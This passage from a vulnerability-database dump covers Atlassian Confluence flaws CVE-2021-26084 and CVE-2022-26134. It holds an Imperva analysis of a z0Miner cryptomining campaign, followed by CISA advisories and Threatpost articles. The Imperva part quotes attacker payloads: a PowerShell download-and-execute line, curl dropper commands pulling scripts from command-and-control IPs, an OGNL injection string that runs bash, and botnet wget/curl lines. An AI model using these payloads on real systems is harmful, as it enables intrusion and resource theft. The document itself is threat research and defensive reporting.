\nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA==&quot;**);\n\nThe powershell payload is base64 encoded, thus decoded into the following code which downloads the sys.ps1 file: \nIEX (New-Object System.Net.Webclient).DownloadString(&#x27;[hxxp://27.1.1.34:8080/docs/s/sys.ps1](<8080/docs/s/sys.ps1>)&#x27;)\n\nShell Dropper scripts: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/26084.txt](<http://27.1.1.34:8080/docs/s/26084.txt>) -o /tmp/.solrg \nPost-exploitation linked clean up scripts that remove all traces of the dropper script mentioned above: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kg.txt](<8080/docs/s/kg.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kk.txt](<8080/docs/s/kk.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kill.sh](<8080/docs/s/kk.txt>) -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using the similar payload found in the vulnerable querystring parameter shown above.\n\nBelow is one example where again the attacker is using different code execution command based on the affected server operating system detected: \nqueryString=aaaaaaaa&#x27;+{Class.forName(&#x27;javax.script.ScriptEngineManager \n&#x27;).newInstance().getEngineByName(&#x27;JavaScript&#x27;).eval(&#x27;var isWin = \njava.lang.System.getProperty(&quot;os.name&quot;).toLowerCase().contains(&quot;win&quot;); \n**var cmd = new java.lang.String(&quot;bash /tmp/.solrg**&quot;);var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command(&quot;cmd.exe&quot;, &quot;/c&quot;, cmd); \n} else{p.command(&quot;bash&quot;, &quot;-c&quot;, cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = &quot;&quot;; var output = &quot;&quot;; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}&#x27;)}+&#x27;\n\n### Dropper Script Analysis\n\nAs mentioned earlier, the first part of the dropper scripts are performing the removal of competing crypto mining processes and their related files.\n\nOn Linux systems:\n\nOn Windows systems:\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malwares (pastebin).\n\nOn Linux systems:\n\nOn Windows systems:\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nAnd finally, the script starting the XMRig mining and execution of post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script which in turn executes solrd, which is the XMRig Miner file that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (function Update($url,$path,$proc_name) that performs file downloads using the WebClient.DownloadFile Method using a System.Net.WebClient object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = &quot;hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe&quot; \n$miner_name = &quot;javae&quot; \n$miner_path = &quot;$env:TMP\\javae.exe&quot; \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = &quot;hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json&quot; \n$miner_cfg_name = &quot;config.json&quot; \n$miner_cfg_path = &quot;$env:TMP\\config.json&quot; \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = &quot;hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat&quot; \n$killmodule_name = &quot;clean.bat&quot; \n$killmodule_path = &quot;$env:TMP\\clean.bat&quot; \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders. \nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to the said function. \nNext it sets the System File, Hidden File and Read-Only attributes for the newly downloaded miner files, and starts the miner process.\n\nLast step is executing the clean-up batch script, and termination of the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTP (tactics, techniques, procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed including downloaders, payloads, configuration, C&amp;C servers and more, we identified a known threat actor that is tied to previous attack campaigns going back as far as March 2021.\n\nThe C&amp;C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet. \nz0Miner is a malicious mining family that became active last year and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the same methodology as mentioned earlier to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IOT Botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing crypto currency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 publicly published, the Imperva Threat Research team immediately began their research on creating a mitigation. It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-06-08T10:28:56", "description": "Threat actors are using public exploits to pummel a critical zero-day remote code execution (RCE) flaw that affects all versions of a popular collaboration tool used in cloud and hybrid server environments and allows for complete host takeover.\n\nResearchers from Volexity uncovered the flaw in Atlassian Confluence Server and Data Center software over the Memorial Day weekend after they detected suspicious activity on two internet-facing web servers belonging to a customer running the software, they said in a [blog post](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) published last week.\n\n\u201cThe file was a well-known copy of the JSP variant of the China Chopper webshell,\u201d researchers wrote. \u201cHowever, a review of the web logs showed that the file had barely been accessed. The webshell appears to have been written as a means of secondary access.\u201d\n\nAtlassian released a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) the same day that Volexity went public with the flaw, warning customers that all supported version of Confluence Server and Data Center after version 1.3.0 were affected and that no updates were available. This prompted the U.S. Department of Homeland Security\u2019s Cybersecurity and Infrastructure Agency (CISA) to issue [a warning of its own](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) about the flaw.\n\nA day later, Atlassian released an update that fixes the following versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it\u2019s also strongly recommending that customers update as soon as they can. If that\u2019s not possible, the company provided in the advisory what it stressed is a \u201ctemporary\u201d workaround for the flaw by updating a list of specific files that correspond to specific versions of the product.\n\n## Threat Escalation\n\nIn the meantime, the situation is escalating quickly into one that security professionals said could reach epic proportions, with exploits surfacing daily and hundreds of unique IP addresses already throttling the vulnerability. Many versions of the affected products also remain unpatched, which also creates a dangerous situation.\n\n\u201cCVE-2022-26134 is about as bad as it gets,\u201d observed Naveen Sunkavalley, chief architect of security firm [Horizon3.ai](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUST9fX64-2FX7G8oio3HdExkfpXlsDdy0DMjoZZzh-2Fv3fxrEs2_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6Vxrf5tVuwdy9pbRo-2F8DNNu3J5mzixD3PJS7t4Hs2TYsOWw0ryNyw1-2BF9EHtf5wuqbWsxGPMD6EQsD7Nyoevetefkt7MGs-2FHajCJChJ0WWQ-2F4es5VBDN8zEwARSv6a1s6u74AUhwTSDRHOo3PP1Q1lKsA-3D>), in an email to Threatpost. Key issues are that the vulnerability is quite easy both to find and exploit, with the latter possible using a single HTTP GET request, he said.\n\nMoreover, the public exploits recently released that allow attackers to use the flaw to enable arbitrary command execution and take over the host against a number of Confluence versions\u2014including the latest unpatched version, 7.18.0, according to tests that Horizon3.ai has conducted, Sunkavaley said.\n\nIndeed, Twitter was blowing up over the past weekend with discussions about public exploits for the vulnerability. On Saturday, Andrew Morris, the CEO of cybersecurity firm [GreyNoise](<https://www.greynoise.io/>)[ tweeted](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZeLQXFApkVnt0p2uzldsLzexNPwWwME1VqzuxM4EPRfjhNCvLBy4YB49i5LBdhVDdk3bdxl9mMqYmby3BCNH00GddZh2Met-2FQVciEWaSqj2-2BDc33IvotYb-2FqKipRNwgEsWia58Lavv8WM5npBgeBdYkvQQSrhYbzaBUUuVaSV4Rk2ztpg8TXpsMCaYdZzeKKPgLWVToUg5Ht0f9g7gPwMwtAvcwxVmnWEDON1KFUmdHIfQ-2FKAQvcO7jS7WvGtrxWKAF52KobJgne5rQpdjvE11Y-2B8djmGzI1Q21AzX5T50A9-2BpHIOYzyAUqoUEWZpFnRzzLqrMu3icBZ57LmFKNxGTRPimDUjR7T8eDeQjnWttOekKn_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxpsA5L19rY7-2Fmx-2BEGIHXPubRKCQX-2B7BpbJqtYfPildu8zaULbUO4ygo24RQuqSIch-2BeFoJjwkkjlXG4ACkLuxahlCVA2m3cewG-2B9vzjCwKJ7F5JEpNGn-2FjGZEpkypXKWLD-2BIhk5XHKrarqem-2FZDDkHA-3D>) that they had begun to see 23 unique IP addresses exploiting the Atlassian vulnerabilities. On Monday, Morris [tweeted again](<https://twitter.com/Andrew___Morris/status/1533504231876993025>) that the number of unique IP addresses attempting to exploit the flaw had risen to 400 in just a 24-hour period.\n\n## **Potential for a SolarWinds 2.0?**\n\nSunkavalley pointed out that the most obvious impact of the vulnerability is that attackers can easily compromise public-facing Confluence instances to gain a foothold into internal networks, and then proceed from there to unleash even further damage.\n\n\u201cConfluence instances often contain a wealth of user data and business-critical information that is valuable for attackers moving laterally within internal networks,\u201d Sunkavalley said.\n\nWhat\u2019s more, the vulnerability is a source-code issue, and attacks at this level \u201care some of the most effective and long reaching attacks on the IT ecosystem,\u201d observed Garret Grajek, CEO of security firm [YouAttest.](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUcpjElsOr6shryTSooYkkS1tJo6a6FxvdH5IYSQBxGNY4H_z_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxtVZHvCB0Vt7i-2Bw8BIBLgZxGqzVWH-2B5yvKoY-2FpPXxD7KFogqV9a0rRV2rH4Hj2p6StEDVbzSc-2FkJf66Q9LkeRnRg9qfA-2Fm-2FP06VV5XsA8rTwU9DmqJ3uYX6CQKoNXRKL350M-2FNS011olthdA2Jkl3v0-3D>)\n\nThe now-infamous [Solarwinds supply-chain attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that started in December 2020 and extended well [into 2021](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) was an example of the level of damage and magnitude of threat that embedded malware can have, and the Confluence bug has the potential to create a similar scenario, he said.\n\n\u201cBy attacking the source code base the hackers are able to manipulate the code to become, in fact, agents of the hacking enterprise, cryptographically registered as legitimate components on the IT system,\u201d Grajek said.\n\nFor this reason, it\u2019s \u201cimperative that enterprises review their code and most importantly the identities that have control of the source system, like Atlassian, to ensure restrictive and legitimate access to their vital code bases,\u201d he asserted.\n", "cvss3": {}, "published": "2022-06-07T11:21:47", "type": "threatpost", "title": "Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T11:21:47", "id": "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "href": "https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like 